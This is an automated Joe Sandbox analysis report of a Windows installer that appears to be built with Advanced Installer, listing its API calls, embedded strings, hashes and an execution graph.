                                                                                                                                                                              Strings
                                                                                                                                                                              • Remove-AppxPackage "%s" exit $error.count, xrefs: 00CE40BD
                                                                                                                                                                              • %s_%s_%s_%s_%s, xrefs: 00CE40A5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$HeapProcess
                                                                                                                                                                              • String ID: %s_%s_%s_%s_%s$Remove-AppxPackage "%s" exit $error.count
                                                                                                                                                                              • API String ID: 275895251-4071003702
                                                                                                                                                                              • Opcode ID: 4b1ae54e38f5dbb19c5715ec21cd2840ae6498358432885e40649e1039ceb30a
                                                                                                                                                                              • Instruction ID: 449b03eba2e229cdde15548af2ee7479bf5378bf193accdc0aea68789fc3d186
                                                                                                                                                                              • Opcode Fuzzy Hash: 4b1ae54e38f5dbb19c5715ec21cd2840ae6498358432885e40649e1039ceb30a
                                                                                                                                                                              • Instruction Fuzzy Hash: 79A19D709012489FDB15DF69CC49B9ABBF4EF45310F1482E9E818A7292DB749F84CFA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 00BB4C16
                                                                                                                                                                              • SendMessageW.USER32(?,00000000,00000000), ref: 00BB4D12
                                                                                                                                                                                • Part of subcall function 00BB6670: SysFreeString.OLEAUT32(00000000), ref: 00BB6713
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFreeMessageSendStringWindow
                                                                                                                                                                              • String ID: AtlAxWin140
                                                                                                                                                                              • API String ID: 4045344427-3842940177
                                                                                                                                                                              • Opcode ID: 4d84ca6b63716de65e2c12946679febf6a0c49cd511c64ed6c0e210f39be3999
                                                                                                                                                                              • Instruction ID: 7e4f4a5ec07ad3b8840bda3d1d3c82ecb38d0b5c16e05d0b95760b04e0b2a8ec
                                                                                                                                                                              • Opcode Fuzzy Hash: 4d84ca6b63716de65e2c12946679febf6a0c49cd511c64ed6c0e210f39be3999
                                                                                                                                                                              • Instruction Fuzzy Hash: 93911674600204AFDB14CF68C888BAABBF9FF48714F2085A9F9199B391D771ED05CB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00D93EFD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                              • String ID: pow
                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                              • Opcode ID: 140793db20006d59c6306b1f32aebc7d1e3e22593f1cb00238b0700afe2d607c
                                                                                                                                                                              • Instruction ID: 84a03ab6538519312d352eb6fe1c99126d8e626fc71fb37164bea0ec111e0e17
                                                                                                                                                                              • Opcode Fuzzy Hash: 140793db20006d59c6306b1f32aebc7d1e3e22593f1cb00238b0700afe2d607c
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F517971E082029ACF117F18C9013BA3BA1DF50740F388D99F4D5862E9EB358D999A76
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • CloseHandle.KERNEL32(?,02141699,000000C9,00000000), ref: 00CFFE23
                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,02141699,000000C9,00000000), ref: 00CFFEB1
                                                                                                                                                                              Strings
                                                                                                                                                                              • << Advanced Installer (x86) Log >>, xrefs: 00CFFD8F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                                                                                                                                              • String ID: << Advanced Installer (x86) Log >>
                                                                                                                                                                              • API String ID: 3699736680-396061572
                                                                                                                                                                              • Opcode ID: 0c927793b31663d8d52c8cddec986c06d2a7c6dc8e24600aea60d495fa571002
                                                                                                                                                                              • Instruction ID: b9117a990c5176b64992560f41a487dd0f47bd634e48dcdbdbe03240e5de4363
                                                                                                                                                                              • Opcode Fuzzy Hash: 0c927793b31663d8d52c8cddec986c06d2a7c6dc8e24600aea60d495fa571002
                                                                                                                                                                              • Instruction Fuzzy Hash: 4B61D070905645DFD700CF69C94879ABBF4FF8A314F1882ADD510EB791DB74AA08CB91
                                                                                                                                                                              APIs
                                                                                                                                                                              • PathIsUNCW.SHLWAPI(?,02141699), ref: 00CBD2D1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Path
                                                                                                                                                                              • String ID: \\?\$\\?\UNC\
                                                                                                                                                                              • API String ID: 2875597873-3019864461
                                                                                                                                                                              • Opcode ID: 3ddaddfd6bcefbd48dc87b1a9bd3c3ecd0d7907e3409b8ff44c5cc9004fe5332
                                                                                                                                                                              • Instruction ID: 1a22a09711995a66ac0981e0da6cb98fe45323872d3c88fbbb9e7040376bfb41
                                                                                                                                                                              • Opcode Fuzzy Hash: 3ddaddfd6bcefbd48dc87b1a9bd3c3ecd0d7907e3409b8ff44c5cc9004fe5332
                                                                                                                                                                              • Instruction Fuzzy Hash: F451E370D046049BDB14DF68C885BEEB7F5FF95304F10861DE81267281EBB56949CBE1
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenEventW.KERNEL32(00000000,00000000,02141699,_pbl_evt,00000008,?,?,00E2FC80,00000001,02141699,00000000), ref: 00D227FE
                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 00D2281B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Event$CreateOpen
                                                                                                                                                                              • String ID: _pbl_evt
                                                                                                                                                                              • API String ID: 2335040897-4023232351
                                                                                                                                                                              • Opcode ID: f601bbc50cb19dbf255b4a8d60db63adc246c13baa9404dc40a368daa10d6e40
                                                                                                                                                                              • Instruction ID: d9b6527cb4b79d9f9d64e806d737694702ec274a464c669708175f597479b2f0
                                                                                                                                                                              • Opcode Fuzzy Hash: f601bbc50cb19dbf255b4a8d60db63adc246c13baa9404dc40a368daa10d6e40
                                                                                                                                                                              • Instruction Fuzzy Hash: A751A371D04618EFDB10DFA8DC86BAEB7B4FB14714F108269F915B7680DB746A04CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,FTP Server,0000000A), ref: 00D05E44
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A,?,00000000,FTP Server,0000000A), ref: 00D05E7D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Init_thread_footer$ErrorHeapLastObjectProcessSingleWait
                                                                                                                                                                              • String ID: REST %u
                                                                                                                                                                              • API String ID: 1670056567-3183379045
                                                                                                                                                                              • Opcode ID: 46f00732bd7f28ee8fe66d5f1883bcc289ee05e33f3aca561395247764df5638
                                                                                                                                                                              • Instruction ID: 312dd9a4baecab9abcd42482de8d6e267b4e7b862c1aa6b653a2a2bee646fbeb
                                                                                                                                                                              • Opcode Fuzzy Hash: 46f00732bd7f28ee8fe66d5f1883bcc289ee05e33f3aca561395247764df5638
                                                                                                                                                                              • Instruction Fuzzy Hash: 9051E071500A059FD720CB69D884B2BB7E5FF01320F284669F89A9B6E1DB74ED44CF60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,02141699,?,?,00EA16AC), ref: 00D0109F
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,00EA16AC), ref: 00D01100
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateDirectoryPathTemp
                                                                                                                                                                              • String ID: ADVINST_LOGS
                                                                                                                                                                              • API String ID: 2885754953-2492584244
                                                                                                                                                                              • Opcode ID: 6dcb5081722615b64bc485bb29e1f9ac52c81f729e907ec64cd586bc8073adf2
                                                                                                                                                                              • Instruction ID: 115b95a1d0102383f87dd6f692a696c4d6b28e8c23290dbf4939a4ba1f7013ff
                                                                                                                                                                              • Opcode Fuzzy Hash: 6dcb5081722615b64bc485bb29e1f9ac52c81f729e907ec64cd586bc8073adf2
                                                                                                                                                                              • Instruction Fuzzy Hash: E951B179900219CACB249F68C8447BAB3F4FF14714F2846AEE959972D0EB354E81CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • FormatMessageW.KERNEL32(000013FF,00000000,?,00000000,00000000,00000000,00000000,02141699,00E2F008), ref: 00CD43EC
                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 00CD44E3
                                                                                                                                                                                • Part of subcall function 00CC0520: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00CC05F5
                                                                                                                                                                              Strings
                                                                                                                                                                              • Failed to get Windows error message [win32 error 0x, xrefs: 00CD440A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FormatFreeIos_base_dtorLocalMessagestd::ios_base::_
                                                                                                                                                                              • String ID: Failed to get Windows error message [win32 error 0x
                                                                                                                                                                              • API String ID: 201254970-3373098694
                                                                                                                                                                              • Opcode ID: 8dadaca9a4e6085d56d1d6f70ad79aa33a08c148355f54572e7894b7ca2c1412
                                                                                                                                                                              • Instruction ID: de444d0102dec5a2ce1807bee4f177d99499d5019adcc85ace9e48e38ea11332
                                                                                                                                                                              • Opcode Fuzzy Hash: 8dadaca9a4e6085d56d1d6f70ad79aa33a08c148355f54572e7894b7ca2c1412
                                                                                                                                                                              • Instruction Fuzzy Hash: C941B470A003089FDB10DF68C946BAEBBF8EF44714F208269E515A7391DB749B48CBD1
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 00BE6C6B
                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE6CCE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                              • API String ID: 3988782225-1405518554
                                                                                                                                                                              • Opcode ID: 616f5c536a6f5e01dfc452afe84783e0a56e2849a5973fd08672ff646b9ba1e4
                                                                                                                                                                              • Instruction ID: 91ba328942c7d2bb4d36e5cbbcc67cef9b7167dc4bfa562c36f1b7168e524b5e
                                                                                                                                                                              • Opcode Fuzzy Hash: 616f5c536a6f5e01dfc452afe84783e0a56e2849a5973fd08672ff646b9ba1e4
                                                                                                                                                                              • Instruction Fuzzy Hash: 8621E070A05784DED720CF69C90478ABBF4EF15300F24869DE48997B81D7B5AA04C7A1
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetParent.USER32(0000000F), ref: 00BC9262
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 00BC9247
                                                                                                                                                                              • Unknown exception, xrefs: 00BC9237
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Parent
                                                                                                                                                                              • String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
                                                                                                                                                                              • API String ID: 975332729-9186675
                                                                                                                                                                              • Opcode ID: ebb1b6f5e52d3dea8d80fdf1842f6795807a3ed6a1e367108fb4ad90bf38b72f
                                                                                                                                                                              • Instruction ID: 9eae44e6e2a37dddb9cba641336749d64961ff2dd08f2a0385eb6b6cf0da5e36
                                                                                                                                                                              • Opcode Fuzzy Hash: ebb1b6f5e52d3dea8d80fdf1842f6795807a3ed6a1e367108fb4ad90bf38b72f
                                                                                                                                                                              • Instruction Fuzzy Hash: E7016D30D05298EFDB04EBE8C959ADDBBB0AF55304F1480D8E441BB296DBB45E48DB92
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              • Unknown exception, xrefs: 00BB47DA
                                                                                                                                                                              • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BB47ED
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ActiveWindow
                                                                                                                                                                              • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                                                                                                                                              • API String ID: 2558294473-2631306498
                                                                                                                                                                              • Opcode ID: b7fc0863be200913dd74cedd66c26374c97ba8d24b328b02b0ae456168a22803
                                                                                                                                                                              • Instruction ID: a7b9486b89e4c7789e57a683d14490f1ce93270c4265fac6a6dc98e6dd73f053
                                                                                                                                                                              • Opcode Fuzzy Hash: b7fc0863be200913dd74cedd66c26374c97ba8d24b328b02b0ae456168a22803
                                                                                                                                                                              • Instruction Fuzzy Hash: 81018030D05298DFCF05EBE8C9556DEBBB0AF56300F148198D0417B387DBB45A08D792
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              • Unknown exception, xrefs: 00BB4466
                                                                                                                                                                              • C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00BB4476
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2948664251.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2948569628.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949414410.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949491844.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949569838.0000000000E9F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ba0000_setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ActiveWindow
                                                                                                                                                                              • String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
                                                                                                                                                                              • API String ID: 2558294473-2631306498
                                                                                                                                                                              • Opcode ID: 621149507591b2c7c7576a163b2390167953717256eb5d61f21a4905f91afa88
                                                                                                                                                                              • Instruction ID: a797cc0d0d5bf18e0593120bb990845632daf7c050236127ffe7ac4df41c29df
                                                                                                                                                                              • Opcode Fuzzy Hash: 621149507591b2c7c7576a163b2390167953717256eb5d61f21a4905f91afa88
                                                                                                                                                                              • Instruction Fuzzy Hash: 18018C30D05298EFCB05DBE8C9556DDBBB0AF56304F148098E042BB386DBB45A08E792

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:1.1%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                              Total number of Nodes:254
                                                                                                                                                                              Total number of Limit Nodes:6
API calls 32519 bc236c 32518->32519 32520->32523 32526 bc2300 std::locale::_Setgloballocale 32520->32526 32541 baa7c0 42 API calls 32520->32541 32522 bc234f 32522->32495 32523->32518 32523->32522 32525 bc233d 32543 d851df 40 API calls __cftof 32525->32543 32526->32523 32542 d852ff 13 API calls __dosmaperr 32526->32542 32528->32489 32529->32489 32530->32478 32532 baa9bd 32531->32532 32544 d81aea 32532->32544 32534 baa9ca RtlAllocateHeap 32534->32483 32535->32488 32536->32492 32537->32511 32538->32515 32539->32512 32540->32516 32541->32526 32542->32525 32543->32523 32545 d81b31 RaiseException 32544->32545 32546 d81b04 32544->32546 32545->32534 32546->32545 32547 baabc0 32548 baabcc 32547->32548 32549 baac04 32547->32549 32548->32549 32550 baa9b0 2 API calls 32548->32550 32550->32549 32551 cb08f0 32552 cb0967 32551->32552 32553 cb0927 32551->32553 32554 d80260 4 API calls 32553->32554 32555 cb0931 32554->32555 32555->32552 32559 d80118 43 API calls 32555->32559 32557 cb0953 32560 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32557->32560 32559->32557 32560->32552 32561 d97f27 GetLastError 32562 d97f3d 32561->32562 32563 d97f43 32561->32563 32596 d99c6f 6 API calls std::_Lockit::_Lockit 32562->32596 32567 d97f47 SetLastError 32563->32567 32584 d99cae 32563->32584 32571 d97f8d 32574 d99cae __Getcoll 6 API calls 32571->32574 32572 d97f7c 32573 d99cae __Getcoll 6 API calls 32572->32573 32581 d97f8a 32573->32581 32575 d97f99 32574->32575 32576 d97f9d 32575->32576 32577 d97fb4 32575->32577 32578 d99cae __Getcoll 6 API calls 32576->32578 32598 d97c04 13 API calls __Getcoll 32577->32598 32578->32581 32597 d9817e 13 API calls __dosmaperr 32581->32597 32582 d97fbf 32599 d9817e 13 API calls __dosmaperr 32582->32599 32600 d99a1e 32584->32600 32587 d99ce8 TlsSetValue 32588 d97f5f 32588->32567 32589 d99720 32588->32589 32595 d9972d __Getcoll 32589->32595 32590 d9976d 32609 d852ff 13 API calls __dosmaperr 32590->32609 32591 d99758 RtlAllocateHeap 32593 
d97f74 32591->32593 32591->32595 32593->32571 32593->32572 32595->32590 32595->32591 32608 d95443 EnterCriticalSection std::_Facet_Register 32595->32608 32596->32563 32597->32567 32598->32582 32599->32567 32601 d99a48 32600->32601 32602 d99a4c 32600->32602 32601->32587 32601->32588 32602->32601 32607 d99953 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 32602->32607 32604 d99a60 32604->32601 32605 d99a66 GetProcAddress 32604->32605 32605->32601 32606 d99a76 std::_Lockit::_Lockit 32605->32606 32606->32601 32607->32604 32608->32595 32609->32593

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C88A31
                                                                                                                                                                                • Part of subcall function 00BAACF0: GetProcessHeap.KERNEL32 ref: 00BAAD45
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAD77
                                                                                                                                                                                • Part of subcall function 00BAACF0: __Init_thread_footer.LIBCMT ref: 00BAAE02
                                                                                                                                                                                • Part of subcall function 00BAA2A0: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,00BA124B,http://,?,80004005,E5106CA8,?,00DAA90F,000000FF), ref: 00BAA2C3
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,00DE0ACD,000000FF), ref: 00C88B04
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2947616455.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2947563281.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948275777.0000000000E9C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2948370821.0000000000E9E000.00000008.00000001.01000000.00000003.sdmp
